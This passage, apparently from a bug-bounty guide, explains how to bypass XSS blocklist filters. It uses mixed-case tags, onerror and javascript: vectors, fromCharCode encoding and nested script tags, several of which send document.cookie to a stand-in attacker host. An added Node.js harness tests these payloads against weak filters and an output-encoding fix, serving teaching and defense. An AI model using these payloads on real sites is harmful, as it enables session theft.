The Guide to Finding and Reporting Web Vulnerabilities
Bypassing XSS Protection
Most applications now implement some sort of XSS protection in their input fields. Often, they’ll use a blocklist to filter out dangerous expressions that might be indicative of XSS. Here are some strategies for bypassing this type of protection.
Alternative JavaScript Syntax
Often, applications will sanitize <script> tags in user input. If that is the case, try executing XSS that doesn’t use a <script> tag. For example, remember that in certain scenarios, you can specify JavaScript to run in other types of tags. When you try to construct an XSS payload, you can also try to insert code into HTML tag names or attributes instead. Say user input is passed into an HTML image tag, like this:
<img src="USER_INPUT">
Instead of closing out the image tag and inserting a script tag, like this
<img src="/><script>alert('XSS by Vickie');</script>"/>
you can insert the JavaScript code directly as an attribute to the current tag:
<img src="123" onerror="alert('XSS by Vickie');"/>
Another way of injecting code without the <script> tag is to use the special URL schemes mentioned before. This snippet will create a Click me! link that will generate an alert box when clicked:
<a href="javascript:alert('XSS by Vickie')">Click me!</a>
Capitalization and Encoding
You can also mix different encodings and capitalizations to confuse the XSS filter. For example, if the filter matches only the exact string "script", capitalize certain letters in your payload. Since HTML tag names are case-insensitive and browsers parse HTML permissively, this won’t affect how the script tag is interpreted:
<scrIPT>location='http://attacker_server_ip/c='+document.cookie;</scrIPT>
If the application filters special HTML characters, like single and double quotes, you can’t write any strings into your XSS payload directly. But you could try using the JavaScript fromCharCode() function, which maps numeric codes to the corresponding ASCII characters, to create the string you need. For example, this piece of code is equivalent to the string "http://attacker_server_ip/?c=":
String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 97, 116, 116, 97, 99, 107,
101, 114, 95, 115, 101, 114, 118, 101, 114, 95, 105, 112, 47, 63, 99, 61)
This means you can construct an XSS payload without quotes, like this:
<scrIPT>location=String.fromCharCode(104, 116, 116, 112, 58, 47,
47, 97, 116, 116, 97, 99, 107, 101, 114, 95, 115, 101, 114, 118,
101, 114, 95, 105, 112, 47, 63, 99, 61)+document.cookie;</scrIPT>
The String.fromCharCode() function returns a string, given an input list of ASCII character codes. You can use this piece of code to translate your exploit string to an ASCII number sequence, either by running the JavaScript in an online JavaScript editor like https://js.do/ or by saving it into an HTML file and loading it in your browser:
<script>
(1) function ascii(c){
  return c.charCodeAt();
}
(2) encoded = "INPUT_STRING".split("").map(ascii);
(3) document.write(encoded);
</script>
The ascii() function (1) converts characters to their ASCII numeric representation. We run each character in the input string through ascii() (2). Finally, we write the translated string to the document (3). Let’s translate the payload http://attacker_server_ip/?c= by using this code:
<script>
function ascii(c){
return c.charCodeAt();
}
encoded = "http://attacker_server_ip/?c=".split("").map(ascii);
document.write(encoded);
</script>
This JavaScript code should print out "104, 116, 116, 112, 58, 47, 47, 97, 116, 116, 97, 99, 107, 101, 114, 95, 115, 101, 114, 118, 101, 114, 95, 105, 112, 47, 63, 99, 61" (document.write() joins the array with commas, so the numbers appear without spaces in the browser). You can then use it to construct your payload by using the fromCharCode() method.
Filter Logic Errors
Finally, you could exploit any errors in the filter logic. For example, sometimes applications remove all <script> tags in the user input to prevent XSS, but do it in a single pass without re-checking the result. If that’s the case, you can use a payload like this:
<scrip<script>t>
location='http://attacker_server_ip/c='+document.cookie;
</scrip</script>t>
Notice that each <script> tag cuts another <script> tag in two. The filter won’t recognize those broken tags as legitimate, but once the filter removes the intact tags from this payload, the rendered input becomes a perfectly valid piece of JavaScript code:
<script>location='http://attacker_server_ip/c='+document.cookie;</script>
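The three filter weaknesses described in this section (blocklisting only the <script> tag, matching it case-sensitively, and stripping it in a single pass) are easy to see side by side. What follows is an added example, not code from the book or its author: a small JavaScript regression harness that runs each weak filter over the section's own payloads and reports where executable markup survives, then shows the same payloads neutralized by context-aware output encoding and an href scheme allowlist instead of a blocklist. The helper names (stripScriptOnce, stripScriptOnePass, stripScriptUntilStable, encodeForHtml, safeHref, looksExecutable, runHarness) are hypothetical; the script runs under Node.js with no dependencies.

```javascript
// Added example, not from the book: a regression harness that runs the blocklist
// filters this section describes against the section's own payloads and contrasts
// them with context-aware output encoding. All function names are hypothetical.

// --- Three blocklist filters of the kind the text describes ---

// Case-sensitive, single pass: "<scrIPT>" survives, and "<scrip<script>t>"
// reassembles into a real <script> tag once the inner tag is cut out.
function stripScriptOnce(input) {
  return input.replace("<script>", "").replace("</script>", "");
}

// Case-insensitive, but still a single pass: the nested payload still reassembles.
function stripScriptOnePass(input) {
  return input.replace(/<\/?script>/gi, "");
}

// Case-insensitive and repeated until nothing changes: closes the "cut in two"
// hole, but onerror= attributes and javascript: URLs never contained "<script>".
function stripScriptUntilStable(input) {
  let prev;
  let cur = input;
  do {
    prev = cur;
    cur = cur.replace(/<\/?script>/gi, "");
  } while (cur !== prev);
  return cur;
}

// --- Mitigations that do not rely on a blocklist ---

// Encode every non-alphanumeric character below U+0100 as &#xHH; (the OWASP rule
// for attribute values, also safe for element content). The browser decodes the
// entities when it reads the value, so a URL still works, but a quote can no
// longer terminate the attribute and "<" can no longer open a tag.
function encodeForHtml(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100 ? `&#x${code.toString(16)};` : ch;
  });
}

// For href/src values: allow only known-safe schemes or scheme-less (relative)
// URLs; anything else becomes about:blank. Tabs and newlines are removed first
// because browsers ignore them inside a URL when determining the scheme.
function safeHref(url) {
  const cleaned = String(url).replace(/[\t\n\r]/g, "").trim();
  const m = cleaned.match(/^([a-z][a-z0-9+.-]*):/i);
  if (!m) return cleaned;
  return ["http", "https", "mailto"].includes(m[1].toLowerCase()) ? cleaned : "about:blank";
}

// Crude check used only by the harness (a test oracle, not a sanitizer): does the
// rendered fragment still contain something a browser would execute?
function looksExecutable(html) {
  return /<script|\son[a-z]+\s*=|javascript:/i.test(html);
}

// --- The section's payloads, reused as regression inputs ---
const PAYLOADS = {
  attribute: "123\" onerror=\"alert('XSS by Vickie');", // lands in <img src="...">
  scheme: "javascript:alert('XSS by Vickie')",           // lands in <a href="...">
  caseMix: "<scrIPT>location='http://attacker_server_ip/c='+document.cookie;</scrIPT>",
  nested: "<scrip<script>t>location='http://attacker_server_ip/c='+document.cookie;</scrip</script>t>",
};

// Places a (filtered) payload in the HTML context the text describes for it.
function render(name, value) {
  if (name === "attribute") return `<img src="${value}">`;
  if (name === "scheme") return `<a href="${value}">Click me!</a>`;
  return value; // element content
}

// Returns, per filter and per payload, whether executable markup survives.
function runHarness() {
  const filters = { stripScriptOnce, stripScriptOnePass, stripScriptUntilStable };
  const results = {};
  for (const [fname, filter] of Object.entries(filters)) {
    results[fname] = {};
    for (const [pname, payload] of Object.entries(PAYLOADS)) {
      results[fname][pname] = looksExecutable(render(pname, filter(payload)));
    }
  }
  // Same payloads and contexts, but encoded for the context instead of blocklisted.
  results.encoded = {};
  for (const [pname, payload] of Object.entries(PAYLOADS)) {
    const value = pname === "scheme" ? safeHref(payload) : payload;
    results.encoded[pname] = looksExecutable(render(pname, encodeForHtml(value)));
  }
  return results;
}

console.log(JSON.stringify(runHarness(), null, 2));
```

Run it with node. The printed table shows true wherever executable markup survives: every blocklist lets at least the attribute and javascript: payloads through, the single-pass variants also let the nested payload reassemble, and the encoded row is false throughout. That is the section's point made concrete: a filter that looks for a particular string can always be iterated on, while encoding for the output context leaves nothing to iterate on.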
These are just a handful of the filter-bypass techniques that you can try. XSS protection is difficult to do right, and hackers are constantly coming up with new techniques to bypass protection. That’s why hackers are still constantly finding and exploiting XSS issues in the wild. For more filter-bypass ideas, check out OWASP’s XSS filter evasion cheat sheet ( https://owasp.org/www-community/xss-filter-evasion-cheatsheet ). You can also simply Google for XSS filter bypass for more interesting articles.